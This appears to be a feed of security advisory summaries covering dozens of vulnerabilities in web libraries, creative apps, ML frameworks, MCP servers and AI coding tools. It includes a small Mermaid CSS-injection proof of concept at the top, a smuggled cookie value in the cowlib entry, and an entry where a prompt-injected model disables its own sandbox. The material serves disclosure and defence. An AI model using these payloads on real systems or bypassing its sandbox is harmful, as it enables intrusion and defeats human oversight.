### Details The state diagram and any other diagram type that routes user-controlled style strings through createCssStyles parser for Mermaid v11.14.0 and earlier captures `classDef` values with an unrestricted regex: ```jison // packages/mermaid/src/diagrams/state/parser/stateDiagram.jison:83 <CLASSDEFID>[^\n]* { this.popState(); return 'CLASSDEF_STYLEOPTS' } ``` The value passes unsanitized through `addStyleClass()` -> `createCssStyles()` -> `style.innerHTML` (mermaidAPI.ts:418). A `}` in the value closes the generated CSS selector, and everything after becomes a new CSS rule on the page. ### PoC ``` stateDiagram-v2 classDef x }*{ background-image: url("http://media.giphy.com/media/SggILpMXO7Xt6/giphy.gif")} ``` Live demo: <https://mermaid.live/edit#pako:eNpFjzFvgzAQhf-KdVNbEcBgMHhtlkqtOnSJKi8ONsYKBmRMlRTx3-skanvTfbp7996t0IxSAYPZC6_2Rmgn7O4rQ00v5nmvWnRG29OKjqI5aTcug9wZK7RiaHH9A4fO-4kliVXSiFibqbvEzWjvnHxo_fI6vR3e6cGXyX2qTcvhcYMItDMSmHeLisAqZ8UVYeUDQhx8p6ziwEIrhTtx4MNVM4nhcxztrywE0h2wVvRzoGWS_z_8rahBKvcckntgmN5OAFvhDIzUNCZZQXCR5nVaZkUEF2BVFpOcEkoxxhUuyRbB980yjStapKHqoKFlhvPtB7BFZEU> ### Patches This has been patched in: - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [8fead23c59166b7bab6a39eac81acebee2859102](https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102)) ### Workarounds Setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ### Impact Enables page defacement, user tracking via `url()` callbacks, and DOM attribute exfiltration via CSS `:has()` selectors.
Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in ninenines cowlib allows HTTP request splitting and cookie smuggling via unvalidated cookie name and value fields. cow_cookie:cookie/1 in cowlib builds a client-side Cookie: request header from a list of name-value pairs without validating either field. An attacker who controls the cookie names or values passed to this function can inject ;, ,, CR, LF, or TAB characters into the serialized header. This enables two classes of attack: cookie smuggling within a single header (e.g. injecting "; admin=1" to introduce a phantom cookie that the receiving server treats as authentic) and HTTP request header splitting (injecting CRLF to append arbitrary headers or smuggle a complete second request against a shared upstream proxy). The decoder side (parse_cookie_name/1, parse_cookie_value/1) and setcookie/3 already validate and reject these characters; the encoder alone is missing the check. This issue affects cowlib from 2.9.0.
Command injection in @wdio/browserstack-service allows arbitrary code execution when malicious git branch names are processed during test orchestration. Attackers can craft repository branch names containing shell metacharacters that execute when the BrowserStack service's getGitMetadataForAISelection() function unsafely passes branch names to Node.js execSync() calls. Exploitation requires configuring WebdriverIO to point at an attacker-controlled repository or cloning into a directory where tests run, making this primarily a supply chain and CI/CD pipeline risk. Publicly available exploit code exists with working proof-of-concept demonstrating file creation via injected commands. Vendor-released patch available in version 9.24.0 per GitHub advisory GHSA-5c46-x3qw-q7j7. CVSS 9.8 (Critical) reflects maximum impact, but real-world exploitation requires either social engineering developers to use malicious repos or compromising upstream dependencies - exploitation probability depends heavily on organizational code review and repository vetting practices.
Zen Browser's auto-update mechanism delivered unsigned code to all users due to deliberately removed MAR signature verification inherited from Firefox. The browser shipped with Mozilla's updater binary stripped of all cryptographic verification code and served update packages containing zero cryptographic signatures. Compromise of the update server or GitHub Actions pipeline allowed arbitrary code execution on all Zen installations without cryptographic chain-of-trust protection. Version 1.19.9b restores MAR signing with RSA-4096 keys and certificate verification in the updater binary.
Heap-based buffer overflow in dnsmasq's DHCPv6 implementation enables local attackers to execute arbitrary code with root privileges. Affects dnsmasq 2.93 (and potentially earlier 2.92 branch based on NixOS patching activity). CERT/CC issued VU#471747, and upstream published CVE-specific advisory at thekelleys.org.uk/dnsmasq/CVE/. NixOS patch activity (PR #519082, #519093) indicates real-world remediation effort. No CISA KEV listing or public POC identified at time of analysis, suggesting limited active exploitation despite high CVSS 8.4 score.
Arbitrary code execution in OpenClaw via CWD-based setup-api.js injection allows local attackers to run malicious JavaScript when users execute OpenClaw commands from attacker-controlled directories. Affects all OpenClaw versions before 2026.4.23. Vendor-released patch available in version 2026.4.23. Exploitation requires user interaction (running OpenClaw commands from a malicious repository) but no authentication. CVSS 7.8 reflects local attack vector with user interaction requirement, mitigating remote exploitation risk.
Remote code execution in OpenClaw npm package versions before 2026.4.20 allows local authenticated users to inject malicious code through MCP stdio server environment variables. Attackers craft workspace configurations containing dangerous environment variables (NODE_OPTIONS, LD_PRELOAD, BASH_ENV) that execute arbitrary code when operators start sessions using those MCP servers. Vendor-released patch available (version 2026.4.20). No public exploit code or active exploitation confirmed at time of analysis, though VulnCheck published detailed technical advisory. CVSS 7.3 reflects local attack vector requiring user interaction, limiting widespread exploitation risk despite high technical impact.
Remote code execution in GitHub Copilot CLI versions prior to 1.0.43 allows attackers to execute arbitrary commands via malicious bare git repositories embedded in project directories. When the CLI agent performs routine git operations, git's automatic bare repository discovery triggers execution of commands specified in config keys like core.fsmonitor. Attackers can deliver the malicious repository through pull requests, compromised dependencies, or pre-existing cloned repositories. No public exploit identified at time of analysis, though the attack technique leverages well-documented git behavior. The vendor-released patch (version 1.0.43) sets safe.bareRepository=explicit to block automatic bare repository discovery.
Remote code execution in OWASP BLT versions prior to 2.1.2 enables attackers to execute arbitrary code with repository write permissions via malicious GitHub pull requests. The vulnerability exploits a GitHub Actions workflow misconfiguration where pull_request_target triggers execute code directly from attacker-controlled forks without proper validation. EPSS data not available; no confirmed active exploitation (not in CISA KEV); publicly disclosed via GitHub Security Advisory GHSA-cgvj-qg2h-cqfh.
Unsafe Python pickle deserialization in pgAdmin 4 FileBackedSessionManager allows authenticated local users with session-directory write access to execute arbitrary code as the pgAdmin process. The vulnerability arises from deserializing session files before validating their HMAC signature, enabling payload injection through crafted pickle objects. Attackers require both valid authentication and filesystem write permission to the sessions directory-achievable through misconfiguration or chaining with a separate path-traversal vulnerability. EPSS exploitation probability and KEV status not provided; no public exploit code identified at time of analysis. PostgreSQL maintainers confirmed the flaw and patched it in version 9.15 by implementing pre-deserialization HMAC validation.
Remote code execution in angular-expressions versions ≤1.5.1 allows unauthenticated network attackers to escape the expression sandbox via malicious filter payloads and execute arbitrary system commands with no user interaction required. CVSS 9.3 (Critical) with confirmed public exploit code available. Vendor-released patch in version 1.5.2 addresses the sandbox escape. Affects applications using angular-expressions as a standalone module for evaluating user-supplied Angular.JS expressions.
Cross-Site WebSocket Hijacking (CSWSH) in Dozzle's /exec and /attach endpoints allows authenticated shell access bypass when --enable-shell is enabled. The vulnerability stems from WebSocket origin validation bypass (CheckOrigin returns true) combined with SameSite=Lax JWT cookies, enabling attackers on same-site origins (sibling subdomains or localhost services) to hijack victim WebSocket sessions and execute arbitrary commands in Docker containers. Affects all Dozzle deployments through version 10.5.1 with shell access enabled. No public exploit identified at time of analysis, but detailed proof-of-concept exists in the GitHub advisory demonstrating container shell access via Python script. CVSS score not assigned, but CWE-346 classification indicates origin validation failure.
Remote code execution in the Custom css-js-php WordPress plugin versions up to 2.0.7 allows unauthenticated attackers to execute arbitrary PHP code on the server through SQL injection chained with PHP eval(). The plugin fails to sanitize user input before passing it to SQL queries, with query results subsequently executed via eval(). EPSS score of 0.02% (5th percentile) suggests low observed exploitation activity, and no public exploit code has been identified at time of analysis, though the technical barrier is low (CVSS AC:L/PR:N).
Cross Site Scripting vulnerability in iotgateway v.3.0.1 allows a remote attacker to execute arbitrary code via the Log Record Function
CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its make_parquet_list.py data processing tool. The script loads PyTorch .pt files (utterance embeddings, speaker embeddings, speech tokens) using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious .pt files within a data directory. When a victim processes this directory using the tool, arbitrary code is executed on the victim's system.
SQL Injection in MuuCMF T6 v1.9.4.20260115 allows an unauthenticated attacker to compromise the entire database, achieve unauthorized administrative access, and potentially gain remote code execution by writing malicious files to the server's file system via the keyword parameter in the /index/controller/Search.php endpoint.
The flash-attention training framework thru commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025-13-04) contains an insecure deserialization vulnerability (CWE-502) in its checkpoint loading mechanism. The load_checkpoint() function in checkpoint.py and the checkpoint loading code in eval.py use torch.load() without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a maliciously crafted checkpoint file. When a victim loads this checkpoint during model warmstarting or evaluation, arbitrary code is executed on the victim's system.
Remote code execution in QuickJS-NG 0.12.1 allows unauthenticated network attackers to execute arbitrary code through the js_mapped_arguments_mark function. The vulnerability enables attackers to achieve code injection with low confidentiality, integrity, and availability impact via network-accessible JavaScript engine exploitation. EPSS score of 0.02% (5th percentile) indicates very low predicted exploitation probability, and no active exploitation has been publicly reported at time of analysis.
GPT-Pilot thru commit 0819827ce20346ef5f25b3fe29293cb448840565 (2025-09-03) contains a command injection vulnerability (CWE-78) in the Executor.run() method. During project execution, when the system prompts the user to confirm or modify a command to be run, it accepts free-text input without proper validation. The user-supplied input is directly passed to asyncio.create_subprocess_shell() for execution. This allows an attacker to replace the intended command with arbitrary shell commands, leading to remote code execution with the privileges of the GPT-Pilot process.
CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading component. The framework uses torch.load() to load model weight files (e.g., llm.pt, flow.pt, hift.pt) without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a malicious model directory containing specially crafted model files. When a victim starts the CosyVoice Web UI pointing to this directory, arbitrary code is executed on the victim's system during the model loading process.
Illustrator versions 29.8.6, 30.3 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Painter versions 12.0.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Painter versions 12.0.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Illustrator versions 29.8.6, 30.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
After Effects versions 26.0, 25.6.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
After Effects versions 26.0, 25.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
After Effects versions 26.0, 25.6.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Media Encoder versions 26.0.2, 25.6.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Media Encoder versions 26.0.2, 25.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Premiere Pro versions 26.0.2, 25.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Premiere Pro versions 26.0.2, 25.6.4 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Premiere Pro versions 26.0.2, 25.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Improper control of generation of code ('code injection') in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.
Improper control of generation of code ('code injection') in Microsoft Data Formulator allows an unauthorized attacker to execute code over a network.
Improper access control for some Intel Vision software for all versions within Ring 3: User Applications may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable remote code execution. This result may potentially occur via network access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (low) and availability (low) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.
Buffer overflow for the Intel(R) Data Center Graphics Driver for VMware ESXi software before version 2.0.2 within Ring 1: Device Drivers may allow an escalation of privilege. System software adversary with a privileged user combined with a low complexity attack may enable local code execution. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (high) impacts.
Integer overflow in the UEFI firmware for the Slim Bootloader may allow an escalation of privilege. System software adversary with a privileged user combined with a low complexity attack may enable local code execution. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (high) and availability (high) impacts.
Sandbox escape in OpenClaude (npm package openclaude) versions before 0.5.1 allows a prompt-injected LLM to disable host sandboxing by setting the model-controlled `dangerouslyDisableSandbox: true` flag in any Bash tool_use call, yielding full unsandboxed command execution on the host. CVSS 4.0 scores this 9.3 Critical (AV:N/AC:L/PR:N/UI:N, VC/VI/VA:H); no public exploit identified at time of analysis beyond the reporter's PoC, but the upstream fix has been merged. The flaw is especially severe because it is reachable under default settings (`allowUnsandboxedCommands` defaults to true).
Unauthenticated remote code execution in Dalfox REST API server mode (versions ≤2.12.0) allows network attackers to execute arbitrary OS commands by injecting shell payloads via the `found-action` parameter in POST /scan requests. The server binds to 0.0.0.0:6664 by default with no API key enforcement unless explicitly configured, and deserializes attacker-controlled JSON directly into execution-control options without sanitization. Attackers trivially guarantee exploitation by hosting a reflective XSS endpoint to trigger the injected command. Fixed in version 2.13.0. CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). EPSS data not available; no CISA KEV listing at time of analysis. Public exploit code exists (detailed proof-of-concept published in GitHub advisory GHSA-v25v-m36w-jp4h).
Code injection in protobufjs-cli's pbjs static generator allows attackers who control protocol buffer schemas to inject malicious JavaScript code into generated output files. The vulnerability affects npm packages protobufjs-cli versions ≤1.2.0 and 2.0.0-2.0.1, with patches released in versions 1.2.1 and 2.0.2. Exploitation requires low complexity with authenticated network access and user interaction (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C), achieving high confidentiality and integrity impact but no availability impact. No CISA KEV listing or public exploit code identified at time of analysis, though GitHub advisory confirms the vulnerability with released patches.
Denial of service in protobufjs allows remote attackers to crash runtime code generation by providing crafted protobuf schemas or JSON descriptors containing unescaped control characters in field names. When affected message types perform encode, decode, verify, or conversion operations, the generated JavaScript code fails to compile, rendering those types unusable. This affects applications that load untrusted schemas; those using only application-defined schemas are not impacted. No code execution is known to occur.
Remote code execution in protobufjs (npm package) versions ≤7.5.5 and 8.0.0-8.0.1 allows attackers to inject and execute arbitrary JavaScript by supplying a malicious protobuf schema with crafted default values in bytes fields. When applications load untrusted protobuf descriptors and call toObject() with defaults enabled, attacker-controlled expressions are emitted into generated conversion functions and executed in the application context. Vendor-released patches are available in versions 7.5.6 and 8.0.2. No public exploit code identified at time of analysis, though the vulnerability is straightforward to weaponize given the clear preconditions in the advisory.
Prototype injection in protobufjs generated message constructors allows attackers controlling plain objects passed to message constructors to modify the prototype chain of individual message instances via an enumerable `__proto__` property. Affects protobufjs versions 7.5.5 and earlier, and 8.0.0-8.0.1. This is a per-instance prototype pollution issue (not global) with impact dependent on downstream application behavior such as inherited property reliance or `instanceof` checks. No active exploitation confirmed; no public exploit identified at time of analysis.
Prototype pollution in protobuf.js type lookup tables enables remote code execution via code injection into generated encode/decode functions. Affects npm package protobuf.js versions ≤7.5.5 and 8.0.0-8.0.1. Exploitation requires chaining with a separate prototype pollution vulnerability-applications must first allow Object.prototype pollution, then invoke protobufjs code generation on attacker-influenced schemas. Vendor-released patches available (v7.5.6, v8.0.2). CVSS 8.1 (High) reflects network vector but high attack complexity (AC:H) due to multi-step prerequisite. No evidence of active exploitation (not in CISA KEV), public exploit code not identified at time of analysis.
Prototype pollution in protobufjs allows denial of service through corrupted JavaScript built-ins when parsing untrusted schemas. Attackers who control protobuf schemas or JSON descriptors can write to inherited object properties on global constructors, causing process-wide state corruption that persists until restart. CVSS 7.5 (High) with network vector and no authentication required, but real-world risk is limited to applications parsing schemas from untrusted sources-applications only decoding untrusted message payloads with trusted schemas are not affected. Vendor-released patches available: v7.5.6 and v8.0.2. No active exploitation confirmed (not in CISA KEV), and no public exploit code identified at time of analysis.
SQL injection in Ivanti Endpoint Manager web console enables authenticated remote attackers to execute arbitrary code on the server. Affects all versions prior to 2024 SU6. Attack requires only low-privilege authenticated access (CVSS PR:L) with low complexity (AC:L), making exploitation straightforward for any authenticated user. Ivanti has released patched version 2024 SU6 per vendor advisory dated May 2026. No CISA KEV listing or public exploit code identified at time of analysis, indicating exploitation not yet confirmed in the wild despite high severity score.
Remote code execution in Ivanti Virtual Traffic Manager allows authenticated administrators to execute arbitrary OS commands via command injection. Affects all versions before 22.9r4. Attack requires network access and administrative credentials but has low complexity (CVSS AC:L). No active exploitation confirmed at time of analysis, though administrative access requirement significantly limits attack surface compared to unauthenticated RCE vulnerabilities.
A remote code execution vulnerability exists in Code Runner MCP Server when run with the --transport http option, which exposes the /mcp JSON-RPC endpoint without authentication on port 3088. An unauthenticated remote attacker can invoke the run-code MCP tool to supply arbitrary source code and execute it via child_process.exec() using the specified language interpreter. This allows execution of arbitrary code with the privileges of the user running the server. This vulnerability has not been fixed and might affect the project in all versions.
Command injection in Siemens RUGGEDCOM ROX industrial network devices enables authenticated remote attackers to execute arbitrary commands with root privileges during feature key installation. The vulnerability affects multiple ROX product lines (MX5000, RX1400, RX1500, RX1501, RX1510, RX1511, RX1512, RX1524, RX1536, RX5000) running firmware versions below V2.17.1. While exploitation requires low-level authentication and higher attack complexity (CVSS 4.0: AV:N/AC:H/PR:L), successful exploitation grants complete control over critical industrial network infrastructure. No public exploit identified at time of analysis, and EPSS data not available for this recently disclosed vulnerability.
Unauthenticated remote code execution in GWD Connect WordPress plugin versions up to 2.9 allows attackers to execute arbitrary PHP code on unregistered installations via the update_agent action in standalone agent endpoints (gwd-backup.php and gwd-logs.php) when the API key is not configured. The vulnerability exploits a missing authorization check that occurs only when the authentication key has not been set up, affecting default installations. No public exploit code or active exploitation has been confirmed at this time.
Improper input validation in an Axis OS configuration file allows authenticated SSH users to execute code and potentially escalate privileges. The vulnerability requires valid SSH credentials but affects all Axis OS versions, making it a significant risk for organizations running Axis network devices with SSH access exposed or shared credentials.
Code injection in SAP Application Server ABAP for SAP NetWeaver and ABAP Platform allows authenticated attackers to execute arbitrary code for subscribed channel users by sending specially crafted inputs. The vulnerability has low integrity impact with no confidentiality or availability consequences. CVSS 4.3 (low severity) reflects the requirement for authenticated access, but the ability to affect other users elevates practical risk in multi-tenant environments.
Arbitrary server-side code execution in SAP Commerce Cloud via unauthenticated malicious configuration upload and code injection. Attackers can remotely exploit a misconfigured Spring Security framework to upload crafted configuration files and inject code without authentication, requiring only that a user interact with malicious content (CVSS:3.1/AV:N/AC:L/PR:N/UI:R). The vulnerability affects SAP Commerce Cloud Configuration with critical impact across confidentiality, integrity, and availability. No public exploit code or CISA KEV listing identified at time of analysis, though EPSS data unavailable. Patch details available in SAP Security Note 3733064.
Arbitrary code execution via torch-checkpoint-shrink.py script in ml-engineering project allows remote attackers to execute malicious Python code by providing crafted PyTorch checkpoint files. The vulnerability stems from insecure deserialization where torch.load() processes .pt files without the weights_only=True safeguard, enabling pickle-based arbitrary object instantiation. Despite a critical CVSS 9.8 score, EPSS probability is low (0.06%, 19th percentile) and no public exploit or active exploitation is confirmed, suggesting limited real-world targeting to date. SSVC assessment indicates total technical impact with automatable exploitation potential, making this a priority for organizations using ml-engineering scripts in production environments.
Arbitrary code execution occurs in the llm CLI tool (versions through 0.27.1) when attackers social-engineer victims into running crafted commands containing malicious Python code in the --functions argument. The tool directly executes this code via unsafe exec() without sanitization, enabling full system compromise. CVSS 9.8 assigns network attack vector and no authentication, but real-world exploitation requires local command execution by a tricked user, creating a significant disparity between the vector and actual attack prerequisites. EPSS score of 0.02% (5th percentile) suggests minimal automated exploitation risk, and no active exploitation or public POC has been identified at time of analysis.
Insecure deserialization in Optimate's neural_magic_training.py script enables remote code execution when loading PyTorch model files. The _load_model() function uses torch.load() without the weights_only=True security parameter, allowing attackers with low privileges to execute arbitrary Python code by providing malicious .pt or .pth files via the --model command-line argument. EPSS indicates low exploitation probability at 0.06% with no active exploitation confirmed.
Remote code execution in Optimate's neural_magic_training.py script allows authenticated attackers to execute arbitrary code via malicious PyTorch model files. The vulnerability stems from unsafe deserialization when loading model state dictionaries without PyTorch's weights_only=True security flag, enabling pickle-based arbitrary object execution. With an EPSS score of 0.06% and no confirmed exploitation, this represents a moderate risk primarily in environments where users can upload or specify model files.
Remote code execution in superduper (Python library) through version 0.10.0 allows unauthenticated network attackers to execute arbitrary system commands by submitting malicious query strings with embedded Python code. The _parse_op_part() function in query.py uses unsafe eval() with inadequate context restrictions, enabling attackers to import modules (such as os) and achieve complete server compromise. EPSS score is low (0.07%, 20th percentile) and no active exploitation is confirmed (CISA KEV absent), but SSVC framework rates technical impact as total. User interaction is required (CVSS UI:R), reducing automated exploitation risk. Authentication requirements not confirmed from available data - CVSS vector shows PR:N (no privileges required) but UI:R suggests user-triggered queries.
An arbitrary file upload vulnerability in MK-Auth 23.01K4.9 allows attackers to execute arbitrary code via uploading a crafted PHP file. Rated high severity (CVSS 8.0), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.
Remote code execution in Kubectl MCP Server v1.1.1 allows unauthenticated network attackers to execute arbitrary commands on systems running the vulnerable server through crafted HTML-based exploitation vectors. Despite a critical 9.8 CVSS score, EPSS rates exploitation likelihood at only 0.02% (4th percentile), suggesting limited real-world targeting thus far. The vulnerability is classified as CWE-94 (Code Injection), affecting an open-source Model Context Protocol (MCP) server implementation for Kubernetes management. No CISA KEV listing indicates absence of confirmed widespread exploitation at time of analysis.
Arbitrary code execution in optimate's neural_magic_training.py allows remote attackers to execute Python code by supplying a malicious directory path containing a crafted module.py file. The _load_model() function directly executes file contents via Python's exec() without validation. CVSS 9.8 reflects network vector with no authentication, but EPSS score of 0.02% (5th percentile) indicates very low observed exploitation probability. No active exploitation confirmed (not in CISA KEV). Vulnerability exists in commit a6d302f912b481c94370811af6b11402f51d377f from July 2024. Affects organizations using optimate for neural network model optimization.
Arbitrary code execution in Snorkel library (Python) through version 0.10.0 enables remote attackers to execute code by supplying malicious pickle files to the BaseLabeler.load() method. The vulnerability stems from unsafe deserialization using pickle.load() without input validation, allowing attackers to craft serialized objects that execute arbitrary commands during deserialization. With EPSS at 6th percentile, exploitation probability remains relatively low despite the critical CVSS score, and no active exploitation (KEV) or public proof-of-concept has been identified at time of analysis.
The CosyVoice project thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading process. When loading model files (.pt) from a user-specified directory (via the --model_dir argument), the code uses torch.load() without the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the Pickle module. An attacker can exploit this by providing a maliciously crafted model directory containing .pt files with embedded pickle payloads. When a victim loads this directory using CosyVoice's web interface, the malicious payload is executed, leading to remote code execution on the victim's system.
Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS close_notify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code.
Remote code execution in TinyZero's HDFS utilities allows unauthenticated attackers to execute arbitrary OS commands via crafted file paths passed through the Hydra configuration framework. The vulnerability stems from unsanitized user input directly interpolated into os.system() shell commands within the _copy() function, affecting all deployments through commit 6652a63c57fa. No active exploitation confirmed at time of analysis, but EPSS score of 0.14% (33rd percentile) suggests below-average likelihood despite CVSS:9.8 critical rating. The attack requires network access to the TinyZero training process and ability to control path parameters via configuration.
Remote code execution in Mamba language model framework (through version 2.2.6) allows unauthenticated attackers to execute arbitrary Python code by publishing malicious models on HuggingFace Hub. When victims call MambaLMHeadModel.from_pretrained() on a weaponized model repository, insecure pickle deserialization executes attacker-controlled code in the context of the victim's process. Despite the critical CVSS 9.8 score and network attack vector requiring no authentication, EPSS probability remains extremely low (0.02%, 5th percentile), suggesting limited real-world exploitation to date. No CISA KEV listing or public POC identified at time of analysis.
Remote code execution in Ludwig framework ≤0.10.4 allows unauthenticated network attackers to execute arbitrary code by supplying a malicious PyTorch model file to the ludwig serve endpoint. The vulnerability stems from unsafe deserialization in the model loading component, which uses torch.load() without the weights_only=True safety parameter. With CVSS 9.8 (critical network vector, no authentication required) but only 0.02% EPSS, this represents a high-severity issue in vulnerable deployments, though widespread exploitation has not been observed. No CISA KEV listing or public POC identified at time of analysis.
Arbitrary code execution in Ludwig framework ≤0.10.4 occurs when attackers supply malicious pickle files to the predict() method, which deserializes untrusted data without validation using pandas.read_pickle(). Remote unauthenticated attackers can achieve full system compromise by exploiting the automatic file format detection mechanism that processes .pkl files through Python's unsafe pickle module. EPSS score of 0.06% (19th percentile) suggests low current exploitation likelihood despite the critical CVSS 9.8 rating, though no public exploit code or active exploitation has been identified at time of analysis.
Arbitrary code execution in imgaug library (versions through 0.4.0) occurs when the BackgroundAugmenter class deserializes malicious pickle payloads without validation in its multiprocessing worker method. Attackers who can influence queue data-through compromised shared queues, malicious input scripts, or social engineering-can achieve remote or local code execution depending on deployment context. CVSS 9.8 critical severity reflects network-based exploitation without authentication, though EPSS probability is low (0.02%, 6th percentile), indicating limited observed exploitation activity. No CISA KEV listing or public exploit code identified at time of analysis.
Remote code execution in Guardrails AI through version 0.6.7 occurs when installing validator packages via the Hub mechanism. The guardrails hub install command dynamically executes post-installation scripts from Hub manifests without validating the script path or content, allowing attackers who publish malicious packages to achieve arbitrary code execution on victim systems during package installation. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS (18th percentile), this represents a supply chain attack requiring user-initiated installation rather than widespread automated exploitation. No active exploitation confirmed (not in CISA KEV), and patch availability not confirmed from available data.
Remote code execution in Horovod distributed training framework (versions through 0.28.1) allows unauthenticated network attackers to execute arbitrary code on worker nodes by injecting malicious pickle payloads into the KVStore HTTP server. The vulnerability combines unauthenticated write access to the KVStore coordination server with unsafe deserialization using cloudpickle.loads(), enabling trivial exploitation against any reachable Horovod cluster. EPSS score of 0.12% (31st percentile) suggests low widespread exploitation probability despite critical CVSS 9.8 rating, and no active exploitation confirmed (not in CISA KEV). Public exploit development is highly feasible given the straightforward attack path and publicly documented details.
Remote code execution in Cognee v0.4.0 and earlier allows unauthenticated attackers to execute arbitrary Python code via the notebook cell execution API endpoint. The vulnerability stems from unsafe use of Python's exec() function without sandboxing or validation, enabling complete system compromise with server process privileges. While not actively exploited (not in KEV), the vulnerability is automatable with total technical impact per SSVC framework, though EPSS indicates low exploitation probability at 0.06%.
Remote code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load untrusted model files via MultitaskClassifier.load(). The vulnerability exploits insecure Python object deserialization through torch.load(), allowing attackers to embed malicious code in model weight files that executes upon loading. EPSS score of 0.06% (19th percentile) suggests low observed exploitation probability in the wild, though SSVC framework indicates total technical impact once exploited. No public exploit code or active exploitation confirmed at time of analysis, but exploitation requires only that a data scientist or ML engineer load a malicious .pkl model file.
Arbitrary code execution in Snorkel machine learning library (≤v0.10.0) occurs when users load malicious model checkpoint files through the Trainer.load() method. The vulnerability stems from unsafe PyTorch deserialization that processes untrusted Pickle objects without the weights_only security parameter. Attackers can embed malicious Python code in model files distributed through repositories, shared datasets, or social engineering campaigns. Despite the 8.8 CVSS score indicating critical severity, EPSS scoring at 0.06% (19th percentile) suggests very low real-world exploitation probability, and no active exploitation or public proof-of-concept has been identified at time of analysis.
